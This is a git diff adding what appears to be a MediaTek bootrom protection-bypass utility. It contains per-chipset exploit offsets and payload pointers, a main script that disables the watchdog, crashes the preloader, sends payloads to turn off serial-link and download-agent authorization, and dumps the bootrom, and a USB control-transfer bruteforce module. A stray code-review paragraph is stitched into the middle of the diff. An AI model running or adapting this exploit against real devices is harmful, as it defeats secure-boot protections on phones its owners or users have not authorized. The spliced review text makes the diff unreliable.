+ "payload": "mt6768_payload.bin",
+ "ptr_usbdl": 0xc190,
+ "ptr_da": 0xc650,
+ },
+
+ "0x788": { // mt6771
+ "var_0": 0x20,
+ "payload": "mt6771_payload.bin",
+ "ptr_usbdl": 0xdebc,
+ "ptr_da": 0xe388,
+ },
+
+ "0x725": { // mt6779
+ "payload": "mt6779_payload.bin",
+ "ptr_usbdl": 0xe04c,
+ "ptr_da": 0xe50c,
+ },
+
+ "0x813": { // mt6785
+ "payload": "mt6785_payload.bin",
+ "ptr_usbdl": 0xe2a4,
+ "ptr_da": 0xe764,
+ },
+
+ "0x6795": { // mt6795
+ "payload": "mt6795_payload.bin",
+ "ptr_usbdl": 0x978c,
+ "ptr_da": 0x9c28,
+ },
+
+ "0x279": { // mt6797
+ "payload": "mt6797_payload.bin",
+ "ptr_usbdl": 0x9eac,
+ "ptr_da": 0xa354,
+ },
+
+ "0x816": { // mt6885
+ "payload": "mt6885_payload.bin",
+ "ptr_usbdl": 0xe6b8,
+ "ptr_da": 0xebbc,
+ },
+
+ "0x8127": { // mt8127
+ "payload": "mt8127_payload.bin",
+ "ptr_usbdl": 0xb2b8,
+ "ptr_da": 0xb740,
+ },
+
+ "0x8163": { // mt8163
+ "var_1": 0xB1,
+ "payload": "mt8163_payload.bin",
+ "ptr_usbdl": 0xc12c,
+ "ptr_da": 0xc5c8,
+ },
+
+ "0x8167": { // mt8516
+ "var_1": 0xCC,
+ "payload": "mt8167_payload.bin",
+ "ptr_usbdl": 0xd2e4,
+ "ptr_da": 0xd7ac,
+ },
+
+ "0x8172": { // mt8173
+ "payload": "mt8173_payload.bin",
+ "payload_address": 0x120A00,
+ "ptr_usbdl": 0xa0e4,
+ "ptr_da": 0xa580,
+ },
+
+ "0x8695": { // mt8695
+ "payload": "mt8695_payload.bin",
+ "ptr_usbdl": 0xbeec,
+ "ptr_da": 0xc3f8,
+ },
+
+ "0x886": { // mt6873
+ "payload": "mt6873_payload.bin",
+ "ptr_usbdl": 0xea78,
+ "ptr_da": 0xef38,
+ },
+
+ "0x562": { // mt6799
+ "watchdog_address": 0x10211000,
+ "payload": "mt6799_payload.bin",
+ "ptr_usbdl": 0xf5ac,
+ "ptr_da": 0xfa78,
+ },
+
+ "0x989": { // mt6833
+ "payload": "mt6833_payload.bin",
+ "ptr_usbdl": 0xdfe0,
+ "ptr_da": 0xe4a0,
+ },
+
+ "0x996": { // mt6853
+ "payload": "mt6853_payload.bin",
+ "ptr_usbdl": 0xea64,
+ "ptr_da": 0xef24,
+ },
+
+ "0x8590": { // mt8590
+ "payload": "mt8590_payload.bin",
+ "ptr_usbdl": 0xbbe4,
+ "ptr_da": 0xc06c,
+ },
+}
diff --git a/exploits_collection/payloads/generic_dump_payload.bin b/exploits_collection/payloads/generic_dump_payload.bin
new file mode 100644
index 0000000000000000000000000000000000000000..f2d5841cef95f48f8f293fbb06c907c6167ce77b
--- /dev/null
+++ b/exploits_collection/payloads/generic_dump_payload.bin
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:5fdceec17aad68669b214dd65caa45a2b889b897936b77803e2f466a348af349
+size 296
diff --git a/exploits_collection/payloads/generic_loader_payload.bin b/exploits_collection/payloads/generic_loader_payload.bin
new file mode 100644
index 0000000000000000000000000000000000000000..7140d64a05812a92311696f9450eaf35a0439a77
--- /dev/null
+++ b/exploits_collection/payloads/generic_loader_payload.bin
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:e887a930a9477ab9a1e56b05b31bb5a58bed30664045338d97f7fe6dc71d3f54
+size 64
diff --git a/exploits_collection/payloads/generic_reboot_payload.bin b/exploits_collection/payloads/generic_reboot_payload.bin
new file mode 100644
index 0000000000000000000000000000000000000000..21b91a608856aedbeb8e4dd1126935fcf774657e
--- /dev/null
+++ b/exploits_collection/payloads/generic_reboot_payload.bin
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:f9c276cb23bc626753286de8b1ff96df5e4b25be3f59bbcf3a8032ac439fe108
+size 48
diff --git a/exploits_collection/payloads/generic_uart_dump_payload.bin b/exploits_collection/payloads/generic_uart_dump_payload.bin
new file mode 100644
index 0000000000000000000000000000000000000000..764b0dc6b8db48b28d0ac4dfc8f2a914f44bd512
--- /dev/null
+++ b/exploits_collection/payloads/generic_uart_dump_payload.bin
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:bcc29db220226c4b900ddbf94023c6f3c3342ce705c26e3493502251238e4b32
+size 312
diff --git a/exploits_collection/payloads/mt6261_payload.bin b/exploits_collection/payloads/mt6261_payload.bin
new file mode 100644
index 0000000000000000000000000000000000000000..2927b229077913a109e6411e820e82fd272d0551
--- /dev/null
+++ b/exploits_collection/payloads/mt6261_payload.bin
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:6c55ce771f424d46fbb9af5ebab73dc35ce272365ca9eb443370b27bc3e31ff7
+size 596
diff --git a/exploits_collection/payloads/mt6572_payload.bin b/exploits_collection/payloads/mt6572_payload.bin
new file mode 100644
index 0000000000000000000000000000000000000000..a03d7ad9f53312e59e3c3c8958bb7ae92ab3bb4b
--- /dev/null
+++ b/exploits_collection/payloads/mt6572_payload.bin
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:512dd5d09e4a34836b24e6caaa130d5209136a1759b1ef1be3dec9721bf04ccc
+size 600
diff --git a/exploits_collection/payloads/mt6580_payload.bin b/exploits_collection/payloads/mt6580_payload.bin
new file mode 100644
index 0000000000000000000000000000000000000000..7ee7cf205aa65c3ab94cf88f8f5d70b9e494b660
--- /dev/null
+++ b/exploits_collection/payloads/mt6580_payload.bin
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:8ded7dfcad11bf60ee0e57b38d56e0ff7ccc8a6780c45fd9d8239ec8df53ba79
+size 600
diff --git a/exploits_collection/payloads/mt6582_payload.bin b/exploits_collection/payloads/mt6582_payload.bin
new file mode 100644
index 0000000000000000000000000000000000000000..29ae4142b4b799ffc2163394de0f1ff370d57150
--- /dev/null
+++ b/exploits_collection/payloads/mt6582_payload.bin
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d65304bbcd3ee0b1c60dfaa706a183d5b3b29e8db62418d660855752289594d2
+size 600
diff --git a/exploits_collection/payloads/mt6592_payload.bin b/exploits_collection/payloads/mt6592_payload.bin
new file mode 100644
index 0000000000000000000000000000000000000000..4556e3a036d7497e5ebed1cccea36235e7845da5
--- /dev/null
+++ b/exploits_collection/payloads/mt6592_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1d44e6cc8eb8d17c95a5b19ab5c951728ed39a6ea5b3e50b1df720df8649a9b4 +size 600 diff --git a/exploits_collection/payloads/mt6595_payload.bin b/exploits_collection/payloads/mt6595_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..04bf2bbb7d5603009f0d999bf5dae8df5a3ae020 --- /dev/null +++ b/exploits_collection/payloads/mt6595_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d7a7363ed2b75a6796c94c6ade0c39a2838c00b7d5cf1e14a6ddcf607eb73634 +size 600 diff --git a/exploits_collection/payloads/mt6735_payload.bin b/exploits_collection/payloads/mt6735_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..854a9916254bfc64a9b040a66bf2ac9c2968a09f --- /dev/null +++ b/exploits_collection/payloads/mt6735_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5a845468619f58aa108236cd2e048374a374a0bf833b05969ffbdf2ca0bb662b +size 600 diff --git a/exploits_collection/payloads/mt6737_payload.bin b/exploits_collection/payloads/mt6737_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..3883a16585378f36cba7ae3ea20a1a0dece5d3e6 --- /dev/null +++ b/exploits_collection/payloads/mt6737_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5b6efe0b5af21699007cd9eb47b88bdd800fd19d6ff70d65dceedd61ee7137e5 +size 600 diff --git a/exploits_collection/payloads/mt6739_payload.bin b/exploits_collection/payloads/mt6739_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..06eecfe9be3eed984df0d785adb9b76b94422eb2 --- /dev/null +++ b/exploits_collection/payloads/mt6739_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d372011cd5c72d94c635a1197c30b24716a8a4611f478888d4264004308ef9d2 +size 612 
diff --git a/exploits_collection/payloads/mt6750_payload.bin b/exploits_collection/payloads/mt6750_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..43e3ad13a4e51595cbf99879deb349954cd5dd36 --- /dev/null +++ b/exploits_collection/payloads/mt6750_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4f952d41829f28b9ad88c0389c719a10c0942eb02ef32d3fe72f3c7fb7bd5f4e +size 684 diff --git a/exploits_collection/payloads/mt6753_payload.bin b/exploits_collection/payloads/mt6753_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..b1284992a7a46d282e4de299a924ad5271fe8ab5 --- /dev/null +++ b/exploits_collection/payloads/mt6753_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ca48914ab40ce2fde63841b7651855c98477a5a93a79e6afc18c4b81d572b206 +size 600 diff --git a/exploits_collection/payloads/mt6755_payload.bin b/exploits_collection/payloads/mt6755_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..9897185b10894e229aadc5e0033c7dce17d44df0 --- /dev/null +++ b/exploits_collection/payloads/mt6755_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fa86a785a0bcf8468285c8922f931a94a2b23dcc93098b3281e5d52f28387262 +size 600 diff --git a/exploits_collection/payloads/mt6757_payload.bin b/exploits_collection/payloads/mt6757_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..79f249e357c66d4681e643a6871e253d16d883b6 --- /dev/null +++ b/exploits_collection/payloads/mt6757_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c27f4b5d4b33c7bfd42d84927371041deb45f195797ebf371d7f713c93f90f57 +size 600 diff --git a/exploits_collection/payloads/mt6761_payload.bin b/exploits_collection/payloads/mt6761_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..a34d220c50a3ac3abaa8f76410b31c63d42a4775 --- /dev/null 
+++ b/exploits_collection/payloads/mt6761_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f0d4f402ecdd17244d96db79e81bbbb4569a093ef0d97709d3cad7d7a5e85ab0 +size 612 diff --git a/exploits_collection/payloads/mt6763_payload.bin b/exploits_collection/payloads/mt6763_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..6fc4c164eda2f68777288b3b150e340380a56859 --- /dev/null +++ b/exploits_collection/payloads/mt6763_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c193fa0c493f90471b23c3a89b339b4523df9cb15e6d9b1e24a749121522cffb +size 612 diff --git a/exploits_collection/payloads/mt6765_payload.bin b/exploits_collection/payloads/mt6765_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..36e398cfaeae2b479be3453b7c754a2bcfb0cd6e --- /dev/null +++ b/exploits_collection/payloads/mt6765_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:da9d34f8d56cc943683620eb79fc48b73872c6cb7e85454c50585fa68b496f46 +size 612 diff --git a/exploits_collection/payloads/mt6768_payload.bin b/exploits_collection/payloads/mt6768_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..3dbaeb3a5b002a9c24b774dffbc047b7d21f4a21 --- /dev/null +++ b/exploits_collection/payloads/mt6768_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8d812ae251c0b6294b8fc180169bd070e5d42b8e54a371cf14e635e4c3cc8302 +size 612 diff --git a/exploits_collection/payloads/mt6771_payload.bin b/exploits_collection/payloads/mt6771_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..1fef8792a04cf5fc0a43362ba830f54f52af34ef --- /dev/null +++ b/exploits_collection/payloads/mt6771_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7488880d5df691aa5fab26128a5632b8921350c31baeb43421735d8e03756bc7 +size 612 
diff --git a/exploits_collection/payloads/mt6779_payload.bin b/exploits_collection/payloads/mt6779_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..c960aa32439e66a2679104caf1a761f8f2059d71 --- /dev/null +++ b/exploits_collection/payloads/mt6779_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:02d95a77511902028a07df411ff51b869fad477b608d612368378f77607fff76 +size 612 diff --git a/exploits_collection/payloads/mt6785_payload.bin b/exploits_collection/payloads/mt6785_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..3977698c8d1605ef3a12830a4d844ea50fcd096c --- /dev/null +++ b/exploits_collection/payloads/mt6785_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f0d47794bb84406ffd0c74a104f8d3237c5393859316b5712d8ce7c20fae4f3c +size 612 diff --git a/exploits_collection/payloads/mt6795_payload.bin b/exploits_collection/payloads/mt6795_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..dc476e01ce091b3b688d3a3810737a8e348990df --- /dev/null +++ b/exploits_collection/payloads/mt6795_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:956b3b4c2643b38c39f1f1241cadd308def77c28c13940ecfe427e40130f59f2 +size 600 diff --git a/exploits_collection/payloads/mt6797_payload.bin b/exploits_collection/payloads/mt6797_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..bea91d1222a4a7f7c6d9425c756a7223b0b7c924 --- /dev/null +++ b/exploits_collection/payloads/mt6797_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e15b2acc3d2fae7b9dab5676cccbb610f1533eeffbf45ddba37777f7a8c6fe8b +size 600 diff --git a/exploits_collection/payloads/mt6799_payload.bin b/exploits_collection/payloads/mt6799_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..dcac52356cc207572fdcff4362f4ee22a25420ee --- /dev/null 
+++ b/exploits_collection/payloads/mt6799_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a4604277287a3032f12651a1294c65c30367adece683220462ee4a2ad8148207 +size 612 diff --git a/exploits_collection/payloads/mt6833_payload.bin b/exploits_collection/payloads/mt6833_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..75cc80280335ab137ffb4f5ccddc81c2706eacf7 --- /dev/null +++ b/exploits_collection/payloads/mt6833_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:878f45230dc7433b45df93b141c34d2cf36f5fe6ac2f9c4e31be0c54d169b5de +size 612 diff --git a/exploits_collection/payloads/mt6853_payload.bin b/exploits_collection/payloads/mt6853_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..97718f93561817ba2dddc0b91f2be2bf6b222cf2 --- /dev/null +++ b/exploits_collection/payloads/mt6853_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0b98563fe19acc5f33af489603bce6678831a7d8674d73ecf2931abffea24a5d +size 612 diff --git a/exploits_collection/payloads/mt6873_payload.bin b/exploits_collection/payloads/mt6873_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..fba48072ec8e09af766e4f78d3658e06d1693214 --- /dev/null +++ b/exploits_collection/payloads/mt6873_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:657f7789d5997f439ef1ec7595675d48c08b8d08e0581b3776e166a85f8fa819 +size 612 diff --git a/exploits_collection/payloads/mt6885_payload.bin b/exploits_collection/payloads/mt6885_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..75ffdeaa81ae1c873b52a32f1b24069c414a25ea --- /dev/null +++ b/exploits_collection/payloads/mt6885_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2a363f1175ec09660ba94b6b5bdbe506e044c4696eae43c3dfe2b1bef13c7440 +size 612 
diff --git a/exploits_collection/payloads/mt8127_payload.bin b/exploits_collection/payloads/mt8127_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..3a065e2c25c275b784bf06239b3fab10f9e6a302 --- /dev/null +++ b/exploits_collection/payloads/mt8127_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:372a67d80b5cca43858deed4f44e82f4c7a69faa0a28f8c1fa90fc8fe88de59f +size 600 diff --git a/exploits_collection/payloads/mt8163_payload.bin b/exploits_collection/payloads/mt8163_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..1da1870e139b5df6258fdca47417efab88f94b2d --- /dev/null +++ b/exploits_collection/payloads/mt8163_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:450676f55daf21f1f6e1c733fa6d8c31b0d2b88598f203fc1e1a5282ffc4995e +size 600 diff --git a/exploits_collection/payloads/mt8167_payload.bin b/exploits_collection/payloads/mt8167_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..da318a035ac3617e02a0a12c8b20d7bdc2912c56 --- /dev/null +++ b/exploits_collection/payloads/mt8167_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ad6bf2b8f10554671715cc1fd27dcae86f6608d6af86b0686c7c5b9669b19a51 +size 612 diff --git a/exploits_collection/payloads/mt8173_payload.bin b/exploits_collection/payloads/mt8173_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..2b80620745cdbdb0155670bd1969aba0dee406fe --- /dev/null +++ b/exploits_collection/payloads/mt8173_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bc65b5184d97098cafcc431454e0549bbdb8e7d5b4f6148800c46343c218faf6 +size 600 diff --git a/exploits_collection/payloads/mt8590_payload.bin b/exploits_collection/payloads/mt8590_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..599e8e7db990f827b08dec86377e90a3e0688e9d --- /dev/null 
+++ b/exploits_collection/payloads/mt8590_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2d5fcc0f926684beb5c9558beecf29ac0f9b1244fdc701fee7ad0a6af3de39c8 +size 600 diff --git a/exploits_collection/payloads/mt8695_payload.bin b/exploits_collection/payloads/mt8695_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..b0ce86ebf30dd34aee3eecce4e3aad23747210fe --- /dev/null +++ b/exploits_collection/payloads/mt8695_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:01653e6daf12d14014a2d3cae9fc2cab8afb34727228197fba09fce70eca035a +size 592 diff --git a/libusb-1.0.dll b/libusb-1.0.dll new file mode 100644 index 0000000000000000000000000000000000000000..77fc2f51f61627e7fe2d0f4104caae8ffded6f38 --- /dev/null +++ b/libusb-1.0.dll @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6b24b0ee1a59cbae385dd15b06eddf2c72b2ff3a875ae279883a880136c59ec8 +size 166912 diff --git a/main.py b/main.py new file mode 100644 index 0000000000000000000000000000000000000000..7336b34c766ecb826785b71d1933c72bdd2c7c87 --- /dev/null +++ b/main.py 
@@ -0,0 +1,237 @@ +#!/bin/python3 + +from src.exploit import exploit +from src.common import from_bytes, to_bytes +from src.config import Config +from src.device import Device +from src.logger import log +from src.bruteforce import bruteforce + +import argparse +import os + +DEFAULT_CONFIG = "exploits_collection/default_config.json5" +PAYLOAD_DIR = "exploits_collection/payloads/" +DEFAULT_PAYLOAD = "generic_dump_payload.bin" +DEFAULT_DA_ADDRESS = 0x200D00 + + +def main(): + parser = argparse.ArgumentParser() + parser.add_argument("-c", "--config", help="Device config") + parser.add_argument("-t", "--test", help="Testmode", const="0x9900", nargs='?') + parser.add_argument("-w", "--watchdog", help="Watchdog address(in hex)") + parser.add_argument("-u", "--uart", help="UART base address(in hex)") + parser.add_argument("-v", "--var_1", help="var_1 value(in hex)") + parser.add_argument("-a", "--payload_address", help="payload_address value(in hex)") + parser.add_argument("-p", "--payload", help="Payload to use") + parser.add_argument("-f", "--force", help="Force exploit on insecure device", action="store_true") + parser.add_argument("-n", "--no_handshake", help="Skip handshake", action="store_true") + parser.add_argument("-m", "--crash_method", help="Method to use for crashing preloader (0, 1, 2)", type=int) + parser.add_argument("-k", "--kamakiri", help="Force use of kamakiri", action="store_true") + arguments = parser.parse_args() + + if arguments.config: + if not os.path.exists(arguments.config): + raise RuntimeError("Config file {} doesn't exist".format(arguments.config)) + elif not os.path.exists(DEFAULT_CONFIG): + raise RuntimeError("Default config is missing") + + device = Device().find() + + config, serial_link_authorization, download_agent_authorization, hw_code = get_device_info(device, arguments) + + while device.preloader: + device = crash_preloader(device, config) + config, serial_link_authorization, download_agent_authorization, hw_code = 
get_device_info(device, arguments) + + log("Disabling watchdog timer") + device.write32(config.watchdog_address, 0x22000064) + + if device.libusb0: + arguments.kamakiri = True + + bootrom__name = "bootrom_" + hex(hw_code)[2:] + ".bin" + + if arguments.test and not arguments.kamakiri: + dump_ptr = int(arguments.test, 16) + found = False + while not found: + log("Test mode, testing " + hex(dump_ptr) + "...") + found, dump_ptr = bruteforce(device, config, dump_ptr) + device.dev.close() + reconnect_message() + device = Device().find(wait=True) + device.handshake() + while device.preloader: + device = crash_preloader(device, config) + device.handshake() + log("Found " + hex(dump_ptr) + ", dumping bootrom to {}".format(bootrom__name)) + open(bootrom__name, "wb").write(bruteforce(device, config, dump_ptr, True)) + exit(0) + + if serial_link_authorization or download_agent_authorization or arguments.force: + log("Disabling protection") + + payload = prepare_payload(config) + + result = exploit(device, config, payload, arguments) + if arguments.test: + while not result: + device.dev.close() + config.var_1 += 1 + log("Test mode, testing " + hex(config.var_1) + "...") + reconnect_message() + device = Device().find(wait=True) + device.handshake() + while device.preloader: + device = crash_preloader(device, config) + device.handshake() + result = exploit(device, config, payload, arguments) + else: + log("Insecure device, sending payload using send_da") + + if not arguments.payload: + config.payload = DEFAULT_PAYLOAD + if not arguments.payload_address: + config.payload_address = DEFAULT_DA_ADDRESS + + payload = prepare_payload(config) + + payload += b'\x00' * 0x100 + + device.send_da(config.payload_address, len(payload), 0x100, payload) + device.jump_da(config.payload_address) + + result = device.read(4) + + if result == to_bytes(0xA1A2A3A4, 4): + log("Protection disabled") + elif result == to_bytes(0xC1C2C3C4, 4): + dump_brom(device, bootrom__name) + elif result == 
to_bytes(0x0000C1C2, 4) and device.read(4) == to_bytes(0xC1C2C3C4, 4): + dump_brom(device, bootrom__name, True) + elif result != b'': + raise RuntimeError("Unexpected result {}".format(result.hex())) + else: + log("Payload did not reply") + + device.close() + +def reconnect_message(): + print("") + print("Please reconnect device in bootrom mode") + print("") + +def dump_brom(device, bootrom__name, word_mode=False): + log("Found send_dword, dumping bootrom to {}".format(bootrom__name)) + + with open(bootrom__name, "wb") as bootrom: + if word_mode: + for i in range(0x20000 // 4): + device.read(4) # discard garbage + bootrom.write(device.read(4)) + else: + bootrom.write(device.read(0x20000)) + + +def prepare_payload(config): + with open(PAYLOAD_DIR + config.payload, "rb") as payload: + payload = payload.read() + + # replace watchdog_address and uart_base in generic payload + payload = bytearray(payload) + if from_bytes(payload[-4:], 4, '<') == 0x10007000: + payload[-4:] = to_bytes(config.watchdog_address, 4, '<') + if from_bytes(payload[-8:][:4], 4, '<') == 0x11002000: + payload[-8:] = to_bytes(config.uart_base, 4, '<') + payload[-4:] + payload = bytes(payload) + + while len(payload) % 4 != 0: + payload += to_bytes(0) + + return payload + + +def get_device_info(device, arguments): + if not arguments.no_handshake: + device.handshake() + + hw_code = device.get_hw_code() + hw_sub_code, hw_ver, sw_ver = device.get_hw_dict() + secure_boot, serial_link_authorization, download_agent_authorization = device.get_target_config() + + if arguments.config: + config_file = open(arguments.config) + config = Config().from_file(config_file, hw_code) + config_file.close() + else: + try: + config = Config().default(hw_code) + except NotImplementedError as e: + if arguments.test: + config = Config() + + log(e) + else: + raise e + + if arguments.test: + config.payload = DEFAULT_PAYLOAD + if arguments.var_1: + config.var_1 = int(arguments.var_1, 16) + if arguments.watchdog: + 
config.watchdog_address = int(arguments.watchdog, 16) + if arguments.uart: + config.uart_base = int(arguments.uart, 16) + if arguments.payload_address: + config.payload_address = int(arguments.payload_address, 16) + if arguments.payload: + config.payload = arguments.payload + if arguments.crash_method: + config.crash_method = arguments.crash_method + + + if not os.path.exists(PAYLOAD_DIR + config.payload): + raise RuntimeError("Payload file {} doesn't exist".format(PAYLOAD_DIR + config.payload)) + + print() + log("Device hw code: {}".format(hex(hw_code))) + log("Device hw sub code: {}".format(hex(hw_sub_code))) + log("Device hw version: {}".format(hex(hw_ver))) + log("Device sw version: {}".format(hex(sw_ver))) + log("Device secure boot: {}".format(secure_boot)) + log("Device serial link authorization: {}".format(serial_link_authorization)) + log("Device download agent authorization: {}".format(download_agent_authorization)) + print() + + return config, serial_link_authorization, download_agent_authorization, hw_code + +def crash_preloader(device, config): + print("") + log("Found device in preloader mode, trying to crash...") + print("") + if config.crash_method == 0: + try: + payload = b'\x00\x01\x9F\xE5\x10\xFF\x2F\xE1' + b'\x00' * 0x110 + device.send_da(0, len(payload), 0, payload) + device.jump_da(0) + except RuntimeError as e: + log(e) + print("") + elif config.crash_method == 1: + payload = b'\x00' * 0x100 + device.send_da(0, len(payload), 0x100, payload) + device.jump_da(0) + elif config.crash_method == 2: + device.read32(0) + + device.dev.close() + + device = Device().find() + + return device + + +if __name__ == "__main__": + main() diff --git a/mtk-bypass-utility.zip b/mtk-bypass-utility.zip new file mode 100644 index 0000000000000000000000000000000000000000..b64ab6bb0de429b3570f73a770dc74b3e37eb715 --- /dev/null +++ b/mtk-bypass-utility.zip 
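Review bot: `if arguments.crash_method:` in get_device_info silently discards an explicit `-m 0`, because 0 is falsy, so a user cannot override a config entry whose crash_method is 1 or 2 back to method 0; test `if arguments.crash_method is not None:` instead. In the `-t` branch of main, `open(bootrom__name, "wb").write(bruteforce(...))` never closes the handle — use `with open(bootrom__name, "wb") as f: f.write(...)` as dump_brom already does. dump_brom itself writes whatever `device.read(0x20000)` returns without checking its length, and Device.read returns a short buffer after a USB timeout, so a partially read bootrom is saved with no warning; check `len(data) == 0x20000` (or at least log the shortfall) before writing. The test-mode path should also prefer `sys.exit(0)` over the `exit` builtin, which is meant for interactive use.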
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d9f0a86c19b91f38cd8e64522fc8b550b3a750120902838a247a50350bd60d8b
+size 6426596
diff --git a/mtk_bypass.bat b/mtk_bypass.bat
new file mode 100644
index 0000000000000000000000000000000000000000..875f4745ee6de0c19b3b2e167020d752d144fa38
--- /dev/null
+++ b/mtk_bypass.bat
@@ -0,0 +1 @@
+start cmd /k "python main.py"
\ No newline at end of file
diff --git a/src/bruteforce.py b/src/bruteforce.py
new file mode 100644
index 0000000000000000000000000000000000000000..57957220c9d95e4218152b0a02dcfc1214b57e03
--- /dev/null
+++ b/src/bruteforce.py
@@ -0,0 +1,63 @@ +from src.common import to_bytes, from_bytes + +import usb +import array +import struct + +def bruteforce(device, config, dump_ptr, dump=False): + + addr = config.watchdog_address + 0x50 + + # We don't need to wait long, if we succeeded + # noinspection PyBroadException + try: + device.dev.timeout = 1 + except Exception: + pass + + udev = device.udev + + try: + # noinspection PyProtectedMember + udev._ctx.managed_claim_interface = lambda *args, **kwargs: None + except AttributeError as e: + raise RuntimeError("libusb is not installed for port {}".format(device.dev.port)) from e + + linecode = udev.ctrl_transfer(0xA1, 0x21, 0, 0, 7) + array.array('B', [0]) + + if dump: + try: + device.cmd_da(0, 0, 1) + device.read32(addr) + except: + pass + + for i in range(4): + udev.ctrl_transfer(0x21, 0x20, 0, 0, linecode + array.array('B', to_bytes(dump_ptr - 6 + (4 - i), 4, '<'))) + udev.ctrl_transfer(0x80, 0x6, 0x0200, 0, 9) + + brom = bytearray(device.cmd_da(0, 0, 0x20000)) + brom[dump_ptr - 1:] = b"\x00" + to_bytes(0x100030, 4, '<') + brom[dump_ptr + 4:] + return brom + + else: + try: + device.cmd_da(0, 0, 1) + device.read32(addr) + except: + pass + + for address in range(dump_ptr, 0xffff, 4): + for i in range(3): + udev.ctrl_transfer(0x21, 0x20, 0, 0, linecode + array.array('B', to_bytes(address - 5 + (3 - i), 4, '<'))) + udev.ctrl_transfer(0x80, 0x6, 0x0200, 0, 9) + try: + if(len(device.cmd_da(0, 0, 0x40))) == 0x40: + return (True, address) + except RuntimeError: + try: + device.read32(addr) + except: + return (False, address + 4) + except Exception: + return (False, address + 4) diff --git a/src/common.py b/src/common.py new file mode 100644 index 0000000000000000000000000000000000000000..479f81cf9ea60ffff23d4f78064806b4cca9784f --- /dev/null +++ b/src/common.py 
